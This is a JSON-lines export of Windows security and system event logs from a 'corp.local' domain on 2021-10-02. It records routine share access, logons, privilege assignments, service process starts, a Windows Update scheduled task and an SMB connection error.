WinEvents.log
{"EventTime":"2021-10-02T18:58:47.573161+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5140,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12808,"OpcodeValue":0,"RecordNumber":190902235,"ExecutionProcessID":4,"ExecutionThreadID":236,"Channel":"Security","Message":"A network share object was accessed.\r\n\t\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1140\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x66A874A\r\n\r\nNetwork Information:\t\r\n\tObject Type:\t\tFile\r\n\tSource Address:\t\t192.168.2.108\r\n\tSource Port:\t\t10596\r\n\t\r\nShare Information:\r\n\tShare Name:\t\t\\\\*\\IPC$\r\n\tShare Path:\t\t\r\n\r\nAccess Request Information:\r\n\tAccess Mask:\t\t0x1\r\n\tAccesses:\t\tReadData (or ListDirectory)\r\n\t\t\t\t\r\n","Category":"File Share","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1140","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x66a874a","ObjectType":"File","IpAddress":"192.168.2.108","IpPort":"10596","ShareName":"\\\\*\\IPC$","AccessMask":"0x1","AccessList":"%%4416\r\n\t\t\t\t","EventReceivedTime":"2021-10-02T18:58:48.651328+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:57:15.277442+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5145,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12811,"OpcodeValue":0,"RecordNumber":190902218,"ExecutionProcessID":512,"ExecutionThreadID":520,"Channel":"Security","Message":"A network share object was checked to see whether client can be granted desired access.\r\n\t\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x66A2581\r\n\r\nNetwork Information:\t\r\n\tObject Type:\t\tFile\r\n\tSource Address:\t\t::1\r\n\tSource Port:\t\t50925\r\n\t\r\nShare Information:\r\n\tShare Name:\t\t\\\\*\\SYSVOL\r\n\tShare Path:\t\t\\??\\C:\\Windows\\SYSVOL\\sysvol\r\n\tRelative Target Name:\tcorp.local\\Policies\\{EE3A026B-45D4-4CF6-BD72-8E4DE6BF6FD0}\\Machine\\Preferences\\Services\\Services.xml\r\n\r\nAccess Request Information:\r\n\tAccess Mask:\t\t0x120089\r\n\tAccesses:\t\tREAD_CONTROL\r\n\t\t\t\tSYNCHRONIZE\r\n\t\t\t\tReadData (or ListDirectory)\r\n\t\t\t\tReadEA\r\n\t\t\t\tReadAttributes\r\n\t\t\t\t\r\nAccess Check Results:\r\n\tREAD_CONTROL:\tGranted by Ownership\r\n\t\t\t\tSYNCHRONIZE:\tGranted by\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\tReadData (or ListDirectory):\tGranted by\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\tReadEA:\tGranted by\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\tReadAttributes:\tGranted by\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\t\r\n","Category":"Detailed File 
Share","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x66a2581","ObjectType":"File","IpAddress":"::1","IpPort":"50925","ShareName":"\\\\*\\SYSVOL","ShareLocalPath":"\\??\\C:\\Windows\\SYSVOL\\sysvol","RelativeTargetName":"corp.local\\Policies\\{EE3A026B-45D4-4CF6-BD72-8E4DE6BF6FD0}\\Machine\\Preferences\\Services\\Services.xml","AccessMask":"0x120089","AccessList":"%%1538\r\n\t\t\t\t%%1541\r\n\t\t\t\t%%4416\r\n\t\t\t\t%%4419\r\n\t\t\t\t%%4423\r\n\t\t\t\t","AccessReason":"%%1538:\t%%1804\r\n\t\t\t\t%%1541:\t%%1801\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\t%%4416:\t%%1801\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\t%%4419:\t%%1801\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\t%%4423:\t%%1801\tD:(A;;0x1200a9;;;WD)\r\n\t\t\t\t","EventReceivedTime":"2021-10-02T18:57:15.636865+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:59:05.463675+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12548,"OpcodeValue":0,"RecordNumber":190902236,"ExecutionProcessID":512,"ExecutionThreadID":3308,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x66A8B6B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x66a8b6b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2021-10-02T18:59:06.869864+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:59:05.463675+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12544,"OpcodeValue":0,"RecordNumber":190902237,"ExecutionProcessID":512,"ExecutionThreadID":3308,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x66A8B6B\r\n\tLogon GUID:\t\t{3C070CCE-4BCE-4089-18CA-DED9A0C4933A}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t\r\n\tSource Network Address:\t127.0.0.1\r\n\tSource Port:\t\t50937\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"DC01$","TargetDomainName":"CORP","TargetLogonId":"0x66a8b6b","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","LogonGuid":"{3C070CCE-4BCE-4089-18CA-DED9A0C4933A}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessId":"0x0","ProcessName":"-","IpAddress":"127.0.0.1","IpPort":"50937","ImpersonationLevel":"%%1833","EventReceivedTime":"2021-10-02T18:59:06.869864+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:55.314065+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4670,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13570,"OpcodeValue":0,"RecordNumber":18995507,"ExecutionProcessID":4,"ExecutionThreadID":10020,"Channel":"Security","Message":"Permissions on an object were changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\tSecurity\r\n\tObject Type:\tToken\r\n\tObject Name:\t-\r\n\tHandle ID:\t0xaa0\r\n\r\nProcess:\r\n\tProcess ID:\t0x2c0\r\n\tProcess Name:\tC:\\Windows\\System32\\services.exe\r\n\r\nPermissions Change:\r\n\tOriginal Security Descriptor:\tD:(A;;GA;;;SY)(A;;GA;;;LS)\r\n\tNew Security Descriptor:\tD:(A;;GA;;;SY)(A;;RC;;;OW)(A;;GA;;;S-1-5-80-2455429942-3131183193-3617688776-595395669-3772047725)","Category":"Authorization Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security","ObjectType":"Token","ObjectName":"-","HandleId":"0xaa0","OldSd":"D:(A;;GA;;;SY)(A;;GA;;;LS)","NewSd":"D:(A;;GA;;;SY)(A;;RC;;;OW)(A;;GA;;;S-1-5-80-2455429942-3131183193-3617688776-595395669-3772047725)","ProcessId":"0x2c0","ProcessName":"C:\\Windows\\System32\\services.exe","EventReceivedTime":"2021-10-02T18:58:57.313105+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:34.588995+05:45","Hostname":"DC01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5857,"SourceName":"Microsoft-Windows-WMI-Activity","ProviderGuid":"{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":513502,"ExecutionProcessID":5108,"ExecutionThreadID":2264,"Channel":"Microsoft-Windows-WMI-Activity/Operational","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"WmiPerfInst provider started with result code 0x0. HostProcess = wmiprvse.exe; ProcessID = 5108; ProviderPath = C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","Opcode":"Info","UserData":"<Operation_StartedOperational xmlns='http://manifests.microsoft.com/win/2006/windows/WMI'><ProviderName>WmiPerfInst</ProviderName><Code>0x0</Code><HostProcess>wmiprvse.exe</HostProcess><ProcessID>5108</ProcessID><ProviderPath>C:\\Windows\\System32\\wbem\\WmiPerfInst.dll</ProviderPath></Operation_StartedOperational>","EventReceivedTime":"2021-10-02T18:58:36.510818+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:55.322103+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4688,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"TaskValue":13312,"OpcodeValue":0,"RecordNumber":18995508,"ExecutionProcessID":4,"ExecutionThreadID":7816,"Channel":"Security","Message":"A new process has been created.\r\n\r\nCreator Subject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nTarget Subject:\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nProcess Information:\r\n\tNew Process ID:\t\t0x134c\r\n\tNew Process Name:\tC:\\Windows\\System32\\svchost.exe\r\n\tToken Elevation Type:\t%%1936\r\n\tMandatory Label:\t\tS-1-16-16384\r\n\tCreator Process ID:\t0x2c0\r\n\tCreator Process Name:\tC:\\Windows\\System32\\services.exe\r\n\tProcess Command Line:\tC:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc\r\n\r\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\r\n\r\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\r\n\r\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. 
An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\r\n\r\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.","Category":"Process Creation","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","NewProcessId":"0x134c","NewProcessName":"C:\\Windows\\System32\\svchost.exe","TokenElevationType":"%%1936","ProcessId":"0x2c0","CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc","TargetUserSid":"S-1-5-19","TargetUserName":"LOCAL SERVICE","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e5","ParentProcessName":"C:\\Windows\\System32\\services.exe","MandatoryLabel":"S-1-16-16384","EventReceivedTime":"2021-10-02T18:58:57.313105+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:54.175101+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":111250,"ExecutionProcessID":612,"ExecutionThreadID":4656,"Channel":"System","Message":"The Background Intelligent Transfer Service service entered the stopped state.","param1":"Background Intelligent Transfer Service","param2":"stopped","EventReceivedTime":"2021-10-02T18:58:55.737674+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:57:15.308683+05:45","Hostname":"DC01.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4674,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13056,"OpcodeValue":0,"RecordNumber":190902221,"ExecutionProcessID":512,"ExecutionThreadID":520,"Channel":"Security","Message":"An operation was attempted on a privileged object.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\tLSA\r\n\tObject Type:\t-\r\n\tObject Name:\t-\r\n\tObject Handle:\t0x0\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x200\r\n\tProcess Name:\tC:\\Windows\\System32\\lsass.exe\r\n\r\nRequested Operation:\r\n\tDesired Access:\t16777216\r\n\tPrivileges:\t\tSeSecurityPrivilege","Category":"Sensitive Privilege Use","Opcode":"Info","SubjectUserSid":"S-1-5-19","SubjectUserName":"LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","ObjectServer":"LSA","ObjectType":"-","ObjectName":"-","HandleId":"0x0","AccessMask":"16777216","PrivilegeList":"SeSecurityPrivilege","ProcessId":"0x200","ProcessName":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2021-10-02T18:57:15.636865+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:52:08.111016+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5379,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13824,"OpcodeValue":0,"RecordNumber":896629,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":740,"Channel":"Security","Message":"Credential Manager credentials were read.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tACC01$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\tRead Operation:\t\tEnumerate Credentials\r\n\r\nThis event occurs when a user performs a read operation on stored credentials in Credential Manager.","Category":"User Account Management","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"ACC01$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","TargetName":"WindowsLive:(cert):name=02juitxxyrjocuia;serviceuri=*","Type":"0","CountOfCredentialsReturned":"0","ReadOperation":"%%8100","ReturnCode":"3221226021","ProcessCreationTime":"2021-09-21T07:15:23.0155705Z","ClientProcessId":"540","EventReceivedTime":"2021-10-02T18:52:09.141871+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:00.353891+05:45","Hostname":"IT03.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4673,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13056,"OpcodeValue":0,"RecordNumber":40730163,"ExecutionProcessID":4,"ExecutionThreadID":4616,"Channel":"Security","Message":"A privileged service was called.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-3281079745-558096271-899791025-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tIT03\r\n\tLogon ID:\t\t0x7052B4\r\n\r\nService:\r\n\tServer:\tSecurity\r\n\tService Name:\t-\r\n\r\nProcess:\r\n\tProcess ID:\t0x15d0\r\n\tProcess Name:\tC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\r\n\r\nService Request Information:\r\n\tPrivileges:\t\tSeTcbPrivilege","Category":"Sensitive Privilege Use","Opcode":"Info","SubjectUserSid":"S-1-5-21-3281079745-558096271-899791025-500","SubjectUserName":"Administrator","SubjectDomainName":"IT03","SubjectLogonId":"0x7052b4","ObjectServer":"Security","Service":"-","PrivilegeList":"SeTcbPrivilege","ProcessId":"0x15d0","ProcessName":"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe","EventReceivedTime":"2021-10-02T18:58:01.377759+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:50:17.695331+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4702,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":896627,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":3856,"Channel":"Security","Message":"A scheduled task was updated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tACC01$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\r\nTask Information:\r\n\tTask Name: \t\t\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start\r\n\tTask New Content: \t\t<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.4\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo>\r\n <Source>Microsoft Corporation.</Source>\r\n <Author>Microsoft Corporation.</Author>\r\n <Description>This task is used to start the Windows Update service when needed to perform scheduled operations such as scans.</Description>\r\n <URI>\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start</URI>\r\n </RegistrationInfo>\r\n <Triggers>\r\n <TimeTrigger>\r\n <StartBoundary>2021-10-03T07:16:51Z</StartBoundary>\r\n <Enabled>true</Enabled>\r\n <RandomDelay>PT1M</RandomDelay>\r\n </TimeTrigger>\r\n <SessionStateChangeTrigger>\r\n <Enabled>false</Enabled>\r\n <StateChange>ConsoleDisconnect</StateChange>\r\n </SessionStateChangeTrigger>\r\n <SessionStateChangeTrigger>\r\n <Enabled>false</Enabled>\r\n <StateChange>RemoteDisconnect</StateChange>\r\n </SessionStateChangeTrigger>\r\n <WnfStateChangeTrigger>\r\n <Enabled>false</Enabled>\r\n <StateName>7508BCA3380C960C</StateName>\r\n <Data>01</Data>\r\n <DataOffset>0</DataOffset>\r\n </WnfStateChangeTrigger>\r\n </Triggers>\r\n <Principals>\r\n <Principal id=\"LocalSystem\">\r\n 
<RunLevel>LeastPrivilege</RunLevel>\r\n <UserId>NT AUTHORITY\\SYSTEM</UserId>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>true</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <Duration>PT10M</Duration>\r\n <WaitTimeout>PT1H</WaitTimeout>\r\n <StopOnIdleEnd>true</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>false</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n <Priority>7</Priority>\r\n </Settings>\r\n <Actions Context=\"LocalSystem\">\r\n <Exec>\r\n <Command>C:\\WINDOWS\\system32\\sc.exe</Command>\r\n <Arguments>start wuauserv</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task>\r\n\r\nOther Information:\r\n\tProcessCreationTime: \t\t3940649673949203\r\n\tClientProcessId: \t\t\t540\r\n\tParentProcessId: \t\t\t632\r\n\tFQDN: \t\t0\r\n\t","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"ACC01$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","TaskName":"\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start","TaskContentNew":"<?xml version=\"1.0\" encoding=\"UTF-16\"?>\n<Task version=\"1.4\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\n <RegistrationInfo>\n <Source>Microsoft Corporation.</Source>\n <Author>Microsoft Corporation.</Author>\n <Description>This task is used to start the Windows Update service when needed to 
perform scheduled operations such as scans.</Description>\n <URI>\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start</URI>\n </RegistrationInfo>\n <Triggers>\n <TimeTrigger>\n <StartBoundary>2021-10-03T07:16:51Z</StartBoundary>\n <Enabled>true</Enabled>\n <RandomDelay>PT1M</RandomDelay>\n </TimeTrigger>\n <SessionStateChangeTrigger>\n <Enabled>false</Enabled>\n <StateChange>ConsoleDisconnect</StateChange>\n </SessionStateChangeTrigger>\n <SessionStateChangeTrigger>\n <Enabled>false</Enabled>\n <StateChange>RemoteDisconnect</StateChange>\n </SessionStateChangeTrigger>\n <WnfStateChangeTrigger>\n <Enabled>false</Enabled>\n <StateName>7508BCA3380C960C</StateName>\n <Data>01</Data>\n <DataOffset>0</DataOffset>\n </WnfStateChangeTrigger>\n </Triggers>\n <Principals>\n <Principal id=\"LocalSystem\">\n <RunLevel>LeastPrivilege</RunLevel>\n <UserId>NT AUTHORITY\\SYSTEM</UserId>\n </Principal>\n </Principals>\n <Settings>\n <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n <AllowHardTerminate>true</AllowHardTerminate>\n <StartWhenAvailable>true</StartWhenAvailable>\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\n <IdleSettings>\n <Duration>PT10M</Duration>\n <WaitTimeout>PT1H</WaitTimeout>\n <StopOnIdleEnd>true</StopOnIdleEnd>\n <RestartOnIdle>false</RestartOnIdle>\n </IdleSettings>\n <AllowStartOnDemand>false</AllowStartOnDemand>\n <Enabled>true</Enabled>\n <Hidden>false</Hidden>\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\n <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\n <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\n <WakeToRun>false</WakeToRun>\n <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\n <Priority>7</Priority>\n </Settings>\n <Actions Context=\"LocalSystem\">\n <Exec>\n <Command>C:\\WINDOWS\\system32\\sc.exe</Command>\n <Arguments>start wuauserv</Arguments>\n </Exec>\n 
</Actions>\n</Task>","ClientProcessStartKey":"3940649673949203","ClientProcessId":"540","ParentProcessId":"632","RpcCallClientLocality":"0","FQDN":"ACC01.prod.corp.local","EventReceivedTime":"2021-10-02T18:50:19.344000+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T05:58:39.230948+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":30803,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1295,"ExecutionProcessID":4,"ExecutionThreadID":2020,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The network connection failed.\r\n\r\nError: The I/O request was canceled.\r\n\r\nServer name: corp.local\r\nServer address: 192.168.2.89:445\r\nConnection type: Wsk\r\n\r\nGuidance:\r\nThis indicates a problem with the underlying network or transport, such as with TCP/IP, and not with SMB. A firewall that blocks port 445 or 5445 can also cause this issue.","Opcode":"Info","Reason":"4","Status":"3221225760","ServerNameLength":"19","ServerName":"corp.local","AddressLength":"16","Address":"020001BDC0A802590000000000000000","ConnectionType":"1","EventReceivedTime":"2021-10-02T05:58:40.277568+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
